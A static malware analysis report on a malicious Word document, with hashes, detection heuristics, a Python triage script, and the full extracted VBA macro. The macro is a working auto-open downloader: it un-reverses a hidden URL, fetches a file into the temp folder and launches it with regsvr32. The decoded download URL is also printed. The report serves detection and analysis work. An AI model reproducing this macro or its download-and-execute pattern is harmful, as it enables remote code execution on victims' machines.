Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9937208619d01626…

MALICIOUS

Office (OOXML)

Size: 59.8 KB
Created: 2020-04-27 09:23:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-09-15
MD5: eb1785e239d3867909fbfe03e56786fd
SHA-1: 3a5f6547a1c2968c200210eb610d628493fd73e9
SHA-256: 9937208619d0162645a6d5a5bd61a4a8b3cc9fa5e25a38c1e379c89251828395
Risk Score: 378

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1105 Ingress Tool Transfer

The sample carries a VBA project whose AutoOpen subroutine runs as soon as the document is opened with macros enabled. AutoOpen instantiates the class module fm, builds a drop path from Environ("tmp") & "\x.tmp", calls fm.Z, which un-reverses a stored URL literal with StrReverse and fetches it with urlmon!URLDownloadToFile into that path, and then calls fm.oP, which launches "regsvr32 <drop path>" through WshShell.Exec. The only obfuscation is the reversed URL and a large amount of dead filler (Abs/Fix/Hex/DateSerial assignments and random-word comments) interleaved with the live statements; no Office parser bug is involved, so the document does nothing until the user enables macros. Besides the three techniques listed above, the regsvr32 launch is System Binary Proxy Execution: Regsvr32 (T1218.010).
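What the macro resolves to can be recovered statically. The Python below is an added triage example, not part of the scanner output or of the sample: it takes a constructed excerpt of the macros.bas listing shown later in this report, strips the dead filler, checks whether fm.Z un-reverses its first argument, and walks AutoOpen with a tiny variable scope so the download URL, drop path and launch command fall out without executing anything. The %TMP% value is a hypothetical victim path, and the LOLBINS set is a short list of well-known launchers that the page itself does not enumerate.

```python
"""Static recovery of what this report's AutoOpen macro does, without
executing it. Added triage example; not part of the scanner output."""
import re
from dataclasses import dataclass, field

# Constructed excerpt: the behaviour-bearing lines of the macros.bas shown in
# this report, plus a few of the filler statements it is padded with so the
# junk filter has something to do.
MACRO_SRC = r'''
Sub AutoOpen()
L = Abs(-76)
' Certainly cultural computational tangent
Dim an
an = 4 * Atn(1)
Dim T As New fm
HF = T.zk("tmp") & "\x.tmp"
Dim WV, OK
WV = 8
OK = 8 / Cos(WV)
T.Z "bac.3opoh=l?php.p23i0oia/58ol02ew/moc.8ztd59l//:ptth", HF
Call T.oP("regsvr32 " + HF)
End Sub
Public Function Z(y, eH)
Bs = Fix(57)
je = URLDownloadToFile(0&, StrReverse(y), eH, 0&, 0&)
End Function
Public Function zk(YJ)
zk = Environ(YJ)
End Function
Public Sub oP(eH)
Dim rg As New WshShell
rg.exec eH
End Sub
'''

# Filler the generator interleaves with real statements: comments, bare Dims,
# and assignments of Abs/Fix/Hex/DateSerial/Cos/Atn results that are never read.
JUNK = re.compile(
    r"^\s*(?:'.*"
    r"|Dim\s+\w+(?:\s*,\s*\w+)*"
    r"|\w+\s*=\s*\d+"
    r"|\w+\s*=\s*(?:Abs|Fix|Hex|DateSerial)\(.*\)"
    r"|\w+\s*=\s*\d+\s*[/*]\s*(?:Cos|Atn)\(.*\))\s*$"
)

# Well-known living-off-the-land launchers (assumed list, not from the page).
LOLBINS = {"regsvr32", "rundll32", "mshta", "certutil", "wscript", "cscript"}


def strip_junk(src: str) -> list:
    """Keep only statements that can have an effect."""
    return [ln.strip() for ln in src.splitlines() if ln.strip() and not JUNK.match(ln)]


def eval_expr(expr: str, scope: dict, env: dict) -> str:
    """Evaluate the only expression forms the macro uses: string literals,
    previously assigned variables and T.zk(name) (an Environ() wrapper),
    joined by & or +. Anything else means the decoder needs extending."""
    out = []
    for tok in re.findall(r'T\.zk\("[^"]*"\)|"[^"]*"|[A-Za-z_]\w*|\S', expr):
        if tok in ("&", "+"):
            continue
        if tok.startswith("T.zk("):
            name = tok[6:-2].lower()
            out.append(env.get(name, f"%{name}%"))
        elif tok.startswith('"'):
            out.append(tok[1:-1])
        elif tok in scope:
            out.append(scope[tok])
        else:
            raise ValueError(f"unsupported token {tok!r} in {expr!r}")
    return "".join(out)


@dataclass
class Recovered:
    url: str = ""
    url_was_reversed: bool = False
    drop_path: str = ""
    command: str = ""
    launcher: str = ""
    attack: list = field(default_factory=list)


def analyse(src: str, env: dict) -> Recovered:
    """Walk AutoOpen with a tiny scope instead of running it."""
    text = "\n".join(strip_junk(src))
    rec = Recovered()
    # Does fm.Z un-reverse its first argument before handing it to urlmon?
    m = re.search(r"Function Z\((\w+)\s*,\s*\w+\)(.*?)End Function", text, re.S)
    rec.url_was_reversed = bool(m and re.search(rf"StrReverse\(\s*{m.group(1)}\s*\)", m.group(2)))
    m = re.search(r"Sub AutoOpen\(\)(.*?)End Sub", text, re.S)
    if not m:
        return rec
    scope = {}
    for ln in m.group(1).splitlines():
        if a := re.fullmatch(r'T\.Z\s+("[^"]*"|\w+)\s*,\s*(.+)', ln):   # download
            url = eval_expr(a.group(1), scope, env)
            rec.url = url[::-1] if rec.url_was_reversed else url
            rec.drop_path = eval_expr(a.group(2), scope, env)
        elif a := re.fullmatch(r"(?:Call\s+)?T\.oP\((.+)\)", ln):      # WshShell.exec
            rec.command = eval_expr(a.group(1), scope, env)
        elif a := re.fullmatch(r"([A-Za-z_]\w*)\s*=\s*(.+)", ln):      # assignment
            scope[a.group(1)] = eval_expr(a.group(2), scope, env)
    if rec.command:
        rec.launcher = rec.command.split()[0].lower()
    rec.attack = ["T1059.005", "T1204.002"]
    if rec.url:
        rec.attack.append("T1105")
    if rec.launcher == "regsvr32":
        rec.attack.append("T1218.010")
    elif rec.launcher in LOLBINS:
        rec.attack.append("T1218")
    return rec


if __name__ == "__main__":
    # Hypothetical victim environment: Environ("tmp") is whatever %TMP% is.
    rec = analyse(MACRO_SRC, {"tmp": r"C:\Users\victim\AppData\Local\Temp"})
    for k, v in vars(rec).items():
        print(f"{k:17}{v}")
```

The literal on the T.Z line reverses to http://l95dtz8.com/we20lo85/aio0i32p.php?l=hopo3.cab, so the server, not the document, decides what x.tmp contains; the dropped path and the regsvr32 command line are the indicators worth hunting for, not the schema namespace URIs listed under Embedded URL below.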

Heuristics 9

  • ClamAV: Doc.Malware.Generic-7898874-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-7898874-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 And Win64 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" ( _
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    ' Regulatory bibliography ferry
    Call T.oP("regsvr32 " + HF)
    RW = Abs(58)
  • VBA URLDownloadToFile reversed-LOLBin launcher critical OLE_VBA_URLDOWNLOAD_REVERSED_LOLBIN
    VBA auto-exec macro downloads a payload with URLDownloadToFile and launches it through WScript.Shell.Exec. The URL is stored as a reversed string literal and un-reversed with StrReverse at call time (fm.Z); the launch command is "regsvr32 " followed by the dropped file path (fm.oP). This is a high-confidence downloader/launcher pattern, not an Office parser CVE.
    Matched line in script
    #If VBA7 And Win64 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" ( _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Enum
    Sub AutoOpen()
    L = Abs(-76)
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    LA = Hex(335)
    zk = Environ(YJ)
    End Function
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every entry below is an OOXML, DrawingML or XMP schema namespace URI; such URIs identify XML vocabularies and are never contacted at run time, so none of them is a network indicator. The real download URL is stored reversed in the macro (the first argument of the T.Z call in the extracted script) and therefore does not appear in this list.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex  Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/ink  Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3d  Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships  Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/math  Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing  Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing  Referenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main  Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordml  Referenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordml  Referenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cid  Referenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symex  Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup  Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk  Referenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordml  Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape  Referenced by macro
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#  Referenced by macro
    • http://ns.adobe.com/xap/1.0/  Referenced by macro
    • http://purl.org/dc/elements/1.1/  Referenced by macro
    • http://ns.adobe.com/xap/1.0/mm/  Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#  Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#  Referenced by macro
    • http://ns.adobe.com/photoshop/1.0/  Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/re  Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 4434 bytes
SHA-256: e8d7253b5568325f8d16e04a4874874dc37888bdf72d61b06bb73e8e3bd6b46b
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "f5"
Function i(H)
Dim iX
iX = DateSerial(1999, 11, 7)
Dim S
S = DateSerial(2000, 5, 8)
End Function
Function r0()

' Occasionally caitiff synod plumage famous derbyshire
b9 = Hex(155)
' Religious
R = Abs(-55)
' Smock flop
iK = Fix(58)
' Amnesty vogue many
p0 = Abs(-9)
' Nine surpass
V = Fix(-35)
' However round
Dim aw
aw = DateSerial(2016, 12, 28)
' Derek trained
Yq = Fix(19)
' Wet understand spain
k = Abs(-59)
' Rely irremediable cat belarus gill
Dim E, dq
E = 4
dq = 4 / Cos(E)
' Agility elopement
yB = Abs(24)
' Her funk refresh
NS = Fix(77)
' Seventh nebula flash pall road deserve

' Canister repairs elfin offing
' Bowl communist serve houses
' Permission
N = Abs(16)
' Adaptation accruing hose inhale unalterable
B = Abs(-36)
' Dung circuits brooklyn bookseller
lZ = Fix(20)
' Suet usurper interpose laughingly troy unmerciful
Zd = Hex(84)
' Causation eighty-four reilly
J = Abs(-1)
' Disconsolate pegasus muck yearn
oJ = Hex(53)
' Rec privateer projectors
wh = Fix(-12)
' Congressional heraldic min
ZR = Abs(58)
' Docility pericles
LO = Abs(-45)
' Czechs orion mistakes repentant val
hB = Hex(216)
' Joyously erosion
Dim Jz
Jz = 4 * Atn(1)
' Ons
' Computed condensation
' Xenophon legate export mediocrity
End Function
Public Enum K6
    
Mo = 1
End Enum
Sub AutoOpen()
L = Abs(-76)
' Certainly cultural computational tangent
Dim an
an = 4 * Atn(1)
Dim vV
vV = DateSerial(2001, 9, 8)
' Principles arras

' Kathleen virile
yT = Fix(38)
qd = Abs(-59)
' Monaco egypt spotless ballet moose analyst
iW = Fix(-38)
' Decent
' Capitulation snout
' Contracts sluggard innovation inside illiteracy caribbean
Dim T As New fm

' Fealty derogatory holdings
Fr = Hex(333)
' Commander
HF = T.zk("tmp") & "\x.tmp"
Dim LJ
LJ = 4 * Atn(1)
Dim Px
Px = DateSerial(2000, 12, 20)
' March operate shops
Bf = Abs(-67)
' Forte estrangement improved
' Seas
' Wheres below bier
T.Z "bac.3opoh=l?php.p23i0oia/58ol02ew/moc.8ztd59l//:ptth", HF
BB = Abs(57)
' Wines great-grandfather socket gateway
Dim WV, OK
WV = 8
OK = 8 / Cos(WV)
Dim m
m = 4 * Atn(1)
' Beaches gut
Dim d4
d4 = 4 * Atn(1)
' Regulatory bibliography ferry
Call T.oP("regsvr32 " + HF)
RW = Abs(58)
' Galore ironic bric-a-brac spoonfuls
' H yea forty-one animals
' Sealing
' Freshman throwing array
vo = Abs(55)
' Dissertation linda
End Sub

Attribute VB_Name = "fm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If
Private Sub Class_Initialize()
Dim Fp
Fp = DateSerial(2012, 11, 19)
' Specialized expenditures
' Deprecate employed juvenile horses
' Reserved ancestry nassau quicksand powers
' Male paul economics mauve canny
End Sub
Private Sub Class_Terminate()

' Sunset anomaly blue pick
Q = Fix(53)
' Tingle donna hosiery
' Ana corp spectacular china guatemala
End Sub
Public Function Z(y, eH)

Bs = Fix(57)
' Channels stroke wanted given scissors
je = URLDownloadToFile(0&, StrReverse(y), eH, 0&, 0&)
End Function
Public Function zk(YJ)
kU = Abs(-58)
ko = Fix(66)
' Disagreed whirr testator physicist
LA = Hex(335)
zk = Environ(YJ)
End Function
Public Sub oP(eH)

' Borough dp spice twig richardson
Dim F3, IM
F3 = 7
IM = 7 / Cos(F3)
' Homesickness ohg.
' Protective stepfather node
bc = Fix(5)
' Expired radio
Dim rg As New WshShell
rg.exec eH
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 25600 bytes
SHA-256: 283039070de69a7e173c858274ac6e4f3a196ee738a9751505ef379f3b7cfab3
Detection: ClamAV: Doc.Malware.Generic-7898874-0
Obfuscation or payload: unlikely